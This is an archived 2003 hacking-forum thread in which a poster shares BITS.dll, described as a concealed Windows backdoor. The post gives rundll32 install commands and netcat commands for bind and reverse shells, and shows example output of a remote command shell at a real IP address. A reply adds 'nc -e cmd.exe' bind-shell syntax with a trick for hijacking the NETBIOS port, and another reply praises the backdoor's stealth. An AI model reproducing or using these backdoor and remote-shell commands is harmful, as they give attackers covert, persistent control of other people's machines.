hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Bits
GovernmentSecurity.org > The Archives > Public Downloads
Anarchy
Sep 17 2003, 11:05 AM
BITS(Background Intelligent Transfer Service)
a great conceal backdoor for windows

install:
rundll32.exe BITS.dll,Install <Active Strings>
Active Strings :specify by uself
uninstall:
rundll32.exe BITS.dll,Uninstall

nc ip port(any port,139.80...)
<Active Strings>@dancewithdolphin[xell]:<PORT>
binder the cmd at anyport

nc -v -l -p listenport
nc IP port
<Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port>

Example:

C:\My Documents>nc 219.237.63.199 139
securitystrings@dancewithdolphin[xell]:7
?

C:\My Documents>nc 219.237.63.199 7
廙icrosoft Windows 2000 [Version 5.00.2195]
© 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

u can install it with
rundll32.exe BITS.dll,Install rasauto <Active Strings>
too

renolde
Sep 17 2003, 03:16 PM
Thanx.
I will check it you.

(wohoo my first post by the way rolleyes.gif )
sir|nfs
Sep 17 2003, 04:30 PM
Can you give an other couple examples?


I do not understand precisily what the .dll does.

Thanks,

Sir NFS

Looks though
enlightnr
Sep 17 2003, 06:22 PM
This program will be cool.
1st reason is seeing the process rundll32.exe running is less conspicious than a dodgy .exe
agamemnon
Sep 20 2003, 12:32 AM
Has anyone actually made this work?
Perhaps i'm not following his "instructions" properly... But then again, they're not exactly the clearest i've ever seen.
Elftor
Sep 20 2003, 12:43 PM
i not sure to have understand it but i'll try ... thank smile.gif
^RB^
Sep 21 2003, 08:26 AM
:eek: I don't really get it myself, but I'll try it out...
Maybe I can find something to make this work...


Thanks for the tools Anarchy!!!!!


^RB^
Johny
Sep 23 2003, 12:03 AM
can anyone explain this a bit better ? don't get it with this explication

maybe someone gives a better example.
I need to use that nc onlyon my own comp ? or also on the hacked one ?
what about the chose of the port ? 80 ? 139? must it be a used port ?
etc ...
MpR
Sep 23 2003, 12:18 AM
Thanks man I found it was as clear as a nice summer day simple as hell too...
agamemnon
Sep 23 2003, 11:07 AM
Please enlighten us then MpR
flame
Sep 23 2003, 11:50 AM
if im not mystaken the correct syntax for getting a shell through nc is:
nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx

This gives Netcat priority over the NETBIOS
service which is at a lower priority because it is bound to ANY IP address.
This is done with the Netcat -s option

and beside that - why do i need the bits.dll if i can nc -l from that machine' isnt that enough ?? please tell me more about this dll= who made it and what does it functions... unsure.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.